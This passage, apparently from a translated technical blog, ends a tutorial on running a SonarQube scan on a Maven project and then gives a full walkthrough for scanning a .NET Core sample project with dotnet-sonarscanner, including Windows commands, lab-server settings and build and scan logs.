<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOuVYqrrgqZlXR2uPHIYi1GwZchWM1W4i3-R2aGkNcArLVaHClwhjhWGaKkCR5O1wMTAuBNBrmL0Qa1OPLgwg6uvrMtNJsVIia4dWpLKwKiXFtMdn3t5X98lle8725nvg-0AlwSyUDoDdUZJEjx-JavgDqv0TUvCcqIyHk_yEdKykSh7h-qihZG9lAQwe9/s846/sonar_net_core_007.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="563" data-original-width="846" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOuVYqrrgqZlXR2uPHIYi1GwZchWM1W4i3-R2aGkNcArLVaHClwhjhWGaKkCR5O1wMTAuBNBrmL0Qa1OPLgwg6uvrMtNJsVIia4dWpLKwKiXFtMdn3t5X98lle8725nvg-0AlwSyUDoDdUZJEjx-JavgDqv0TUvCcqIyHk_yEdKykSh7h-qihZG9lAQwe9/w400-h266/sonar_net_core_007.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">6. Select the type of project to be scanned (Maven).</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZXZikEOybXNhW9KZxJdpD4VOKdFsuC6aHDCxh_TTWvvr8ft6_ZjN0aLE88QdawVDB2ZLiRmuG_tqpuclSPgf-hCjLF826PA_hqaSdLiYjjNeQ66WCPlYx7NMqL4Y8XFuctG0rTIsifkYKkZLK0j2ESJmChiMHxvv78JEbrNQE-DDcbMC-9-EKK5tIScQN/s1660/maven%E6%8E%83%E6%8F%8F01.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="702" data-original-width="1660" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZXZikEOybXNhW9KZxJdpD4VOKdFsuC6aHDCxh_TTWvvr8ft6_ZjN0aLE88QdawVDB2ZLiRmuG_tqpuclSPgf-hCjLF826PA_hqaSdLiYjjNeQ66WCPlYx7NMqL4Y8XFuctG0rTIsifkYKkZLK0j2ESJmChiMHxvv78JEbrNQE-DDcbMC-9-EKK5tIScQN/w400-h169/maven%E6%8E%83%E6%8F%8F01.png" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div>
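<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(3) Open a Command Prompt and change the working directory to the Maven project to be scanned. This example uses the sonarqube-scanner-msbuild project from <a href="https://github.com/SonarSource/sonar-scanning-examples" target="_blank">sonar-scanning-examples-master</a> for the demonstration; after download it is placed in C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild.</p><p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"><span style="text-indent: -2em;">(4) If the requirements of sections I and II are met, you can directly copy and run the command that SonarQube provides.<br />Because that command is in Linux format and this example runs on Windows, the command must be adjusted by rewriting the original command as a single line:</span></p>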
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRGtXpR48QJwRZ6-kFdKrGBreJnscnT1mkaBIGWMsnsbKVIvqB3mijkRjlGYfZbFufC85y0V4IjztZ9H8GrK84emSP-ZYRXAkWGkhDbhR_b0b4IO7p-FZijSFZDJb0BFuWS-y9ODDQ3OmARpB3x6lBxVVmiHui05mXf9AGyggoXwvsf3T-2HcZcGp8SXha/s1096/sonar-command.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="378" data-original-width="1096" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRGtXpR48QJwRZ6-kFdKrGBreJnscnT1mkaBIGWMsnsbKVIvqB3mijkRjlGYfZbFufC85y0V4IjztZ9H8GrK84emSP-ZYRXAkWGkhDbhR_b0b4IO7p-FZijSFZDJb0BFuWS-y9ODDQ3OmARpB3x6lBxVVmiHui05mXf9AGyggoXwvsf3T-2HcZcGp8SXha/w400-h138/sonar-command.png" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(5) To switch SDK versions flexibly, open a Command Prompt and run the following in order:<br /></p>
<div style="background-color: black; border: 1px dashed rgb(211, 84, 0); line-height: 100%; padding: 4px; word-break: break-all;"><span><span style="color: white;">C:\></span><span style="color: #e69138;">set JAVA_HOME=c:\java\jdk-11.0.2</span><br />
<span style="color: white;">C:\></span><span style="color: #e69138;">set path=%JAVA_HOME%\bin;%PATH%</span><span style="color: #e69138;"> </span><span style="color: #04ff00;"># prepended so that it takes precedence</span><br />
<span style="color: white;">C:\></span><span style="color: #e69138;">cd c:\sonar-scanning-examples-master\sonarqube-scanner-msbuild</span><br /><span style="color: white;">
C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild></span></span><span style="color: #e69138;">mvn clean verify sonar:sonar -Dsonar.projectKey=Examp-Maven-A -Dsonar.host.url=http://192.168.232.129:9000 -Dsonar.login=sqp_dba30fef39a3676dd2c2bba4ae197d96ae58aa03</span><br /><br /><span style="color: #04ff00;"> or</span><br /><span style="color: white;"><br />C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild></span><span style="color: #e69138;">mvn clean verify <span style="background-color: #caff33;">org.sonarsource.scanner.maven:sonar-maven-plugin:3.9.1.2184</span>:sonar -Dsonar.projectKey=Examp-Maven-A -Dsonar.host.url=http://192.168.232.129:9000 -Dsonar.login=sqp_dba30fef39a3676dd2c2bba4ae197d96ae58aa03
</span></div>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(6) The execution proceeds as shown below (<span style="color: #e69138;"><b>the parts in orange are the commands I ran</b></span>).</p>
<div style="background-color: black; border: 1px dashed rgb(211, 84, 0); line-height: 100%; padding: 4px; word-break: break-all;"><span style="color: white;">C:\></span><span style="color: #e69138;">java -version</span><br /><span style="color: white;">openjdk version "11.0.2" 2019-01-15</span><br /><span style="color: white;">
OpenJDK Runtime Environment 18.9 (build 11.0.2+9)</span><br /><span style="color: white;">
OpenJDK 64-Bit Server VM 18.9 (build 11.0.2+9, mixed mode)<br /></span><br /><span style="color: white;">
C:\></span><span style="color: #e69138;">cd sonar-scanning-examples-master\sonarqube-scanner-maven\maven-multimodule</span><br /><span style="color: white;">
C:\sonar-scanning-examples-master\sonarqube-scanner-maven\maven-multimodule></span><span style="color: #e69138;">mvn clean verify org.sonarsource.scanner.maven:sonar-maven-plugin:3.9.1.2184:sonar -Dsonar.projectKey=Examp-Maven-A -Dsonar.host.url=http://192.168.232.129:9000 -Dsonar.login=sqp_dba30fef39a3676dd2c2bba4ae197d96ae58aa03</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Scanning for projects...</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] ------------------------------------------------------------------------</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Reactor Build Order:</span><br />
<span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">]</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Example of multi-module Maven project [pom]</span><br />
<span style="color: white;">[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Module 1 [jar]</span><br />
<span style="color: white;">[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Module 2 [jar]</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Tests [jar]</span><br />
<span><br /><b><span style="color: #ff00fe;">&lt;&lt;some messages omitted&gt;&gt;</span></b></span><br /><span style="color: white;"><br />[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] ANALYSIS SUCCESSFUL, you can find the results at: http://192.168.232.129:9000/dashboard?id=Examp-Maven-A</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Note that you will be able to access the updated dashboard once the server has processed the submitted analysis report</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] More about the report processing at http://192.168.232.129:9000/api/ce/task?id=AYrZSjAxVbRR_GlSxZsf</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Analysis total time: 7.571 s</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] ------------------------------------------------------------------------</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Reactor Summary for Example of multi-module Maven project 1.0-SNAPSHOT:</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">]</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Example of multi-module Maven project .............. SUCCESS [ 9.495 s]</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Module 1 ........................................... </span><span style="color: #04ff00;">SUCCESS</span><span style="color: white;"> [ 6.353 s]</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Module 2 ........................................... </span><span style="color: #04ff00;">SUCCESS</span><span style="color: white;"> [ 1.566 s]</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Tests .............................................. </span><span style="color: #04ff00;">SUCCESS</span><span style="color: white;"> [ 1.851 s]</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] ------------------------------------------------------------------------</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] </span><span style="color: #04ff00;">BUILD SUCCESS</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] ------------------------------------------------------------------------</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Total time: 23.218 s</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] Finished at: 2023-09-28T08:57:11+08:00</span><br /><span style="color: white;">
[</span><span style="color: #76a5af;">INFO</span><span style="color: white;">] ------------------------------------------------------------------------</span><br /><br /><span style="color: white;">
C:\sonar-scanning-examples-master\sonarqube-scanner-maven\maven-multimodule></span></div>
<hr style="border: 2px solid rgb(14, 230, 34);" />
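<p style="margin-bottom: 8px; text-indent: 2em;">If the preceding steps were carried out correctly, the scan should complete and end with "EXECUTION SUCCESS". If an error occurs along the way, read the messages carefully and use Google or ChatGPT to find the answer.</p>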
<p style="margin-bottom: 8px; text-indent: 2em;">Once the scan is complete, the project results are visible in the SonarQube Scanner Web UI.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH8G09tFcE2Ip7-O9CH0ka8lECr3YmuBhfMI-VkzPL6y6RRnDWrUGTYoWkboFFMfRXuVwupBVNn4WYJGHuwwu5l_cqi95nrAew_ataWShVAiOGwvM0QOSqih5BQTbdwjkMnAUHiRVHAUbLXbu9J8dMfbqa5FeGCwiF0TvL83-EVtekzrdd3r3CV4vb8UH_/s1701/results.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="386" data-original-width="1701" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH8G09tFcE2Ip7-O9CH0ka8lECr3YmuBhfMI-VkzPL6y6RRnDWrUGTYoWkboFFMfRXuVwupBVNn4WYJGHuwwu5l_cqi95nrAew_ataWShVAiOGwvM0QOSqih5BQTbdwjkMnAUHiRVHAUbLXbu9J8dMfbqa5FeGCwiF0TvL83-EVtekzrdd3r3CV4vb8UH_/w400-h91/results.png" width="400" /></a></div>
<hr style="border: 2px solid rgb(14, 230, 34);" />
<p style="margin-left: 1em;">For scanning dotNet Framework projects, see: <a href="http://以SonarQube執行.netFramework專案的源碼掃描(白箱掃描)">Source Code Scanning of .netFramework Projects with SonarQube (White-Box Scanning)</a></p>
<p style="margin-left: 1em;">For scanning dotNet Core projects, see: <a href="http://atic-tw.blogspot.com/2023/09/sonarqubedotnet-core.html" target="_blank">Scanning dotNet Core Project Source Code with SonarQube (White-Box Scanning)</a></p>
</div>
<p>Author: 雅技資訊技術</p>
<p>Published 2023-09-26T20:25:00.004+08:00, updated 2023-09-28T11:03:35.429+08:00</p>
<p>Scanning dotNet Core Project Source Code with SonarQube (White-Box Scanning)</p>
<div style="border: 3px solid rgb(17, 122, 101); line-height: 150%; padding: 8px;">
<p style="margin-bottom: 8px; text-indent: 2em;"><a href="https://www.sonarsource.com/products/sonarqube/downloads/?gads_campaign=SQ-Mroi-PMax&gads_ad_group=Global&gads_keyword=&_gl=1*va5gvw*_up*MQ..&gclid=CjwKCAjwmbqoBhAgEiwACIjzEI66FX1-IEadA5PhZD8AlOYcaDmlO2JNog-wx0y8seU7bEGnQSX7NBoCkNAQAvD_BwE" target="_blank">SonarQube</a> is a white-box scanning tool. This example uses the free, open-source Community edition<span style="text-indent: 2em;">; for installation, see "<a href="http://atic-tw.blogspot.com/2023/03/kali-linuxarachnisonarqube.html" target="_blank">Building Black-Box and White-Box Scanning Systems on KALI Linux (Arachni and SonarQube)</a>".</span></p>
<p style="margin-bottom: 8px; text-indent: 2em;">This article uses the dotNet Core sample "<a href="https://github.com/MagicianredLabs/dotnetcore5-example" style="text-indent: -32px;" target="_blank"><span style="text-indent: -2em;">MagicianredLabs</span><span style="text-indent: -2em;">/</span><span style="text-indent: -2em;">dotnetcore5-example</span></a>" on GitHub for the demonstration. To scan another dotNet Core project, adjust the steps to that project's environment and structure, especially the tool and SDK versions.</p>
<p style="color: #274e13; margin-bottom: 0px;"><b>I. Prerequisites</b></p>
<p style="margin-bottom: 0px; margin-left: 4em; margin-top: 0px; text-indent: -2em;"><span style="text-indent: -2em;">(1) </span><a href="https://dotnet.microsoft.com/en-us/download/dotnet" style="text-indent: -2em;" target="_blank">dotNet SDK</a></p>
<p style="margin-left: 4em; margin-top: 0px;">Either the installer or the ZIP archive can be downloaded. This example uses the Amd 64 ZIP build of 7.0.201, extracted directly to a directory of choice, C:\dotNet.core\dotnet-x64-7.0.201, and this path is added to the <b><span style="color: red;">Path </span></b>environment variable.</p>
<p style="margin-bottom: 0px; margin-left: 4em; margin-top: 0px; text-indent: -2em;"><span style="text-indent: -2em;">(2) Check whether the "%</span><span style="text-indent: -2em;">USERPROFILE%\.dotnet\tools" directory contains the file "</span><span style="text-indent: -2em;">dotnet-sonarscanner.exe" and the ".store" directory. If not, run the following commands to install the sonarscanner </span>global<span style="text-indent: -2em;"> tool for dotNet Core:</span></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px;"><span style="color: #b45f06;"><span style="text-indent: 0px;">cd C:\dotNet.core\dotnet-x64-7.0.201<br /></span><span style="text-indent: -2em;">dotnet tool install --global dotnet-sonarscanner --version 5.13.1</span></span></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px;"><b><span style="color: red;">Note: </span></b>see <a href="https://www.nuget.org/packages/dotnet-sonarscanner" target="_blank">NuGet</a> for the versions that --version X.X.X supports.</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"></p>
<p style="color: #274e13; margin-bottom: 0px;"><b>II. Running the Scan</b></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px; text-indent: -2em;">(1) Start the SonarQube Scanner Server, assumed here to be at "<span style="color: #cc0000;">http://192.168.232.153:9000</span>"</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(2) Connect to the SonarQube Scanner Server with a browser and create a scan project (when rescanning an existing project, have its Project Token ready)</p>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">1. On the Projects page, choose "Create Project" -> "Manually"</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/s1573/sonar_net_003.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="1573" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/w400-h63/sonar_net_003.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">2. The Community edition only offers "Locally"</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/s647/sonar_net_005.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="647" data-original-width="440" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/w273-h400/sonar_net_005.PNG" width="273" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">3. Fill in "Project display name" and "Project key"</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/s700/sonar_net_004.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="700" data-original-width="549" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/w314-h400/sonar_net_004.PNG" width="314" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">4. Generate the Project Token (the project's identity credential)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/s815/sonar_net_006.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="613" data-original-width="815" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/w400-h301/sonar_net_006.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">5. Make a note of the Project Token</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOuVYqrrgqZlXR2uPHIYi1GwZchWM1W4i3-R2aGkNcArLVaHClwhjhWGaKkCR5O1wMTAuBNBrmL0Qa1OPLgwg6uvrMtNJsVIia4dWpLKwKiXFtMdn3t5X98lle8725nvg-0AlwSyUDoDdUZJEjx-JavgDqv0TUvCcqIyHk_yEdKykSh7h-qihZG9lAQwe9/s846/sonar_net_core_007.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="563" data-original-width="846" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOuVYqrrgqZlXR2uPHIYi1GwZchWM1W4i3-R2aGkNcArLVaHClwhjhWGaKkCR5O1wMTAuBNBrmL0Qa1OPLgwg6uvrMtNJsVIia4dWpLKwKiXFtMdn3t5X98lle8725nvg-0AlwSyUDoDdUZJEjx-JavgDqv0TUvCcqIyHk_yEdKykSh7h-qihZG9lAQwe9/w400-h266/sonar_net_core_007.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">6. Select the type of project to scan (.NET)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi4oJwac08e5AL_MMBNpKKZ8eUrlR6auvM7OvTLQMJB1mCad_Nw0cJFUz0WK5QzXtNlO5nmj_d3rO3vQl3mp7HCPSLvbCngkFbeHatUmGuaX8Yvavqniy663_wmmkPJQkPt8iyJwJn9KYfmuN0KIvFnC4WiSYQjMvorqS2nsY4GwxTgyj8twFHrHmgFcfk/s630/sonar_net_008.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="531" data-original-width="630" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi4oJwac08e5AL_MMBNpKKZ8eUrlR6auvM7OvTLQMJB1mCad_Nw0cJFUz0WK5QzXtNlO5nmj_d3rO3vQl3mp7HCPSLvbCngkFbeHatUmGuaX8Yvavqniy663_wmmkPJQkPt8iyJwJn9KYfmuN0KIvFnC4WiSYQjMvorqS2nsY4GwxTgyj8twFHrHmgFcfk/w400-h338/sonar_net_008.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">7. Select the .NET flavor (.NET Core)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxQ0QHrEffPSE9zV6V6wJhSx5n_Dr5F8zCgB6Nssa69OaQUJgHR-vVhEuefXIVAXI3XzX_demYPlciyoqbAYYKHxXNBf5LwxhfJebb-enkFonv2mEbriWWErDzloUILmKs6wLY4vP3g_hV_9ySv7y1ryOWcivGpQ-D-oM-RQK6H-k8wUiDFA-oorkSzsCP/s1558/sonar_net_core_009.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1204" data-original-width="1558" height="309" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxQ0QHrEffPSE9zV6V6wJhSx5n_Dr5F8zCgB6Nssa69OaQUJgHR-vVhEuefXIVAXI3XzX_demYPlciyoqbAYYKHxXNBf5LwxhfJebb-enkFonv2mEbriWWErDzloUILmKs6wLY4vP3g_hV_9ySv7y1ryOWcivGpQ-D-oM-RQK6H-k8wUiDFA-oorkSzsCP/w400-h309/sonar_net_core_009.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"><span style="text-indent: -2em;">(3) Open a Command Prompt and change the working directory to the dotNet Core project to be scanned. This example uses the it.example.dotnetcore5 project from </span><a href="https://github.com/MagicianredLabs/dotnetcore5-example" target="_blank"><span style="text-indent: -2em;">MagicianredLabs</span><span style="text-indent: -2em;">/</span><span style="text-indent: -2em;">dotnetcore5-example</span></a>, downloaded to D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5.</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"><span style="text-indent: -2em;">(4) If item (2) of section I has already been completed, ignore the first command in the screenshot above (dotnet tool install --global dotnet-sonarscanner).<br />If the dotNet SDK directory is already in the PATH environment variable, copy and run the remaining three commands provided by SonarQube one at a time.<br />To switch SDK versions flexibly, run "set PATH=SDKPath;%PATH%" before the scan commands to set the path (replace SDKPath with the actual dotNet SDK path).</span></p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"><span style="text-indent: -2em;">(5) The run looks like this (<span style="color: #e69138;"><b>the orange-red parts are the commands I ran</b></span>)</span></p><p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"></p>
<div style="background-color: black; border: 1px dashed rgb(211, 84, 0); line-height: 100%; padding: 4px; word-break: break-all;">
<span style="color: white;">C:\></span><span><span style="color: #e69138;">set path=C:\dotNet-x64-7.0.201;%path%</span><br /><span style="color: white;">C:\></span><span style="color: #e69138;">d:</span><br /><span style="color: white;">D:\></span></span><span style="color: #e69138;">cd d:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5</span><br />
<span style="color: white;">D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5></span><span style="color: #e69138;"><span>dotnet sonarscanner begin /k:".netFram</span><span>ework-Example.core" /d:sonar.host.url="http://192.168.232.153:9000" /d:sonar.login="sqp_c855f5d97c43571f467c8757cd5bcd1e9bb8792a"</span></span><br />
<span style="color: white;">SonarScanner for MSBuild 5.13.1</span><br />
<span style="color: white;">Using the .NET Core version of the Scanner for MSBuild</span><br />
<span style="color: white;">Pre-processing started.</span><br />
<span style="color: white;">Preparing working directories...</span><br />
<span style="color: #ff00fe;"><b>&lt;&lt;some messages omitted&gt;&gt;</b></span><br />
<span style="color: white;"><br /></span>
<span style="color: white;">D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5></span><span style="color: #e69138;">dotnet build</span><br />
<span style="color: white;">MSBuild version 17.5.0-preview-23061-01+040e2a90e for .NET</span><br />
<span style="color: white;"> 正在判斷要還原的專案...</span><br />
<span style="color: white;">&lt;&lt;some messages omitted&gt;&gt;</span><br />
<span style="color: white;"> Sonar: (it.example.dotnetcore5.webapi.tests.integration.csproj) Project processed successfully</span><br />
<span style="color: white;"><br /></span><br />
<span style="color: #04ff00;">建置成功。</span><br />
<span style="color: white;"><br /></span><br />
<span style="color: #fcff01;">C:\dotNet-x64-7.0.201\sdk\7.0.201\Sdks\Microsoft.NET.Sdk\targets\Microsoft.NET.EolTargetFrameworks.targets(28,5): warning NETSDK1138: 目標 Framework 'net5.0' 已不受支援,未來將不會再收到任何安全性更新。如需支援原則的詳細資訊,請參閱 https://aka.ms/dotnet-core-support。 [D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5\it.example.dotnetcore5.bl\it.example.dotnetcore5.bl.csproj]</span><br />
<span><b><span style="color: #ff00fe;">&lt;&lt;some messages omitted&gt;&gt;</span></b><br /></span><br />
<span style="color: #fcff01;">D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5\it.example.dotnetcore5.webapi\Program.cs(12,18): warning S1118: Add a 'protected' constructor or the 'static' keyword to the class declaration. [D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5\it.example.dotnetcore5.webapi\it.example.dotnetcore5.webapi.csproj]</span><br />
<span style="color: #fcff01;"> 39 個警告</span><br />
<span style="color: white;"> 0 個錯誤</span><br />
<span style="color: white;"><br /></span>
<span style="color: white;">經過時間 00:01:51.00</span><br />
<span style="color: white;"><br /></span>
<span style="color: white;">D:\sonar-scanning-examples-master\dotnetcore5-example-main\it.example.dotnetcore5></span><span style="color: #e69138;"><span>dotnet sonarscanner end /d:sonar.login</span><span>="sqp_c855f5d97c43571f467c8757cd5bcd1e9bb8792a"</span></span><br />
<span style="color: white;">SonarScanner for MSBuild 5.13.1</span><br />
<span style="color: white;">Using the .NET Core version of the Scanner for MSBuild</span><br />
<span style="color: white;">Post-processing started.</span><br />
<span style="color: white;">Calling the SonarScanner CLI...</span><br />
<span><span style="color: #ff00fe;"><b>&lt;&lt;some messages omitted&gt;&gt;</b></span><br /></span><br />
<span style="color: white;">INFO: More about the report processing at http://192.168.232.153:9000/api/ce/task?id=AYrMzgcpHOOPZyW4SWNL</span><br />
<span style="color: white;">INFO: Analysis total time: 14.247 s</span><br />
<span style="color: white;">INFO: ------------------------------------------------------------------------</span><br />
<span style="color: white;">INFO: <span style="background-color: #600685;">EXECUTION SUCCESS</span></span><br />
<span style="color: white;">INFO: ------------------------------------------------------------------------</span><br />
<span style="color: white;">INFO: Total time: 17.470s</span><br />
<span style="color: white;">INFO: Final Memory: 17M/60M</span><br />
<span style="color: white;">INFO: ------------------------------------------------------------------------</span><br />
<span style="background-color: #600685; color: white;">The SonarScanner CLI has finished</span><br />
<span style="color: white;">19:34:12.82 Post-processing succeeded.</span><br />
<span style="color: white;"><br /></span>
